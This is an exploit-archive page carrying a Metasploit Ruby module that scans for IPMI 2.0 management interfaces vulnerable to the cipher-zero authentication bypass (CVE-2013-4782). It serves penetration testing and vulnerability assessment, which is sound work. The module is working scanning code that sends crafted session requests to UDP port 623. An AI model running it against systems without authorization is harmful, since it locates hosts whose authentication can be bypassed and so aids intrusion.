IPMI 2.0 Cipher Zero Authentication Bypass Scanner

IPMI 2.0 Cipher Zero Authentication Bypass Scanner: Posted Sep 1, 2024; Site metasploit.com; This Metasploit module identifies IPMI 2.0-compatible systems that are vulnerable to an authentication bypass vulnerability through the use of cipher zero.; advisories | CVE-2013-4782; SHA-256 | 26e9ad81107fc09e95e82be07f34c04f0ca67ba5b75765817108fcc2774346df; Download | Favorite | View

IPMI 2.0 Cipher Zero Authentication Bypass Scanner

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::UDPScanner

  def initialize
    super(
      'Name'        => 'IPMI 2.0 Cipher Zero Authentication Bypass Scanner',
      'Description' => %q|
        This module identifies IPMI 2.0-compatible systems that are vulnerable
        to an authentication bypass vulnerability through the use of cipher
        zero.
        |,
      'Author'      => [ 'Dan Farmer <zen[at]fish2.com>', 'hdm' ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2013-4782'],
          ['URL', 'http://fish2.com/ipmi/cipherzero.html'],
          ['OSVDB', '93038'],
          ['OSVDB', '93039'],
          ['OSVDB', '93040'],

        ],
      'DisclosureDate' => 'Jun 20 2013'
    )

    register_options(
    [
      Opt::RPORT(623)
    ])

  end

  def scanner_prescan(batch)
    print_status("Sending IPMI requests to #{batch[0]}->#{batch[-1]} (#{batch.length} hosts)")
    @res = {}
  end

  def scan_host(ip)
    console_session_id = Rex::Text.rand_text(4)
    scanner_send(
      Rex::Proto::IPMI::Utils.create_ipmi_session_open_cipher_zero_request(console_session_id),
      ip, datastore['RPORT']
    )
  end

  def scanner_process(data, shost, sport)
    info = Rex::Proto::IPMI::Open_Session_Reply.new.read(data)#  rescue nil
    return unless info && info.session_payload_type == Rex::Proto::IPMI::PAYLOAD_RMCPPLUSOPEN_REP

    # Ignore duplicate replies
    return if @res[shost]

    @res[shost] ||= info

    if info.error_code == 0
      print_good("#{shost}:#{sport} - IPMI - VULNERABLE: Accepted a session open request for cipher zero")
      report_vuln(
        :host  => shost,
        :port  => datastore['RPORT'].to_i,
        :proto => 'udp',
        :sname => 'ipmi',
        :name  => 'IPMI 2.0 RAKP Cipher Zero Authentication Bypass',
        :info  => "Accepted a session open request for cipher zero",
        :refs  => self.references
      )
    else
      vprint_status("#{shost}:#{sport} - IPMI - NOT VULNERABLE: Rejected cipher zero with error code #{info.error_code}")
    end
  end
end

Top Authors In Last 30 Days

Red Hat 219 files
Jay Turla 150 files
indoushka 133 files
Ubuntu 59 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
Gentoo 33 files
H D Moore 31 files
Debian 27 files

File Archives

Systems

AIX (429)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,112)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (50,975)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,661)
Slackware (941)
Solaris (1,614)
SUSE (1,444)
Ubuntu (9,793)
UNIX (9,443)
UnixWare (187)
Windows (6,756)
Other

IPMI 2.0 Cipher Zero Authentication Bypass Scanner

IPMI 2.0 Cipher Zero Authentication Bypass Scanner

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

IPMI 2.0 Cipher Zero Authentication Bypass Scanner

Share This

IPMI 2.0 Cipher Zero Authentication Bypass Scanner

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems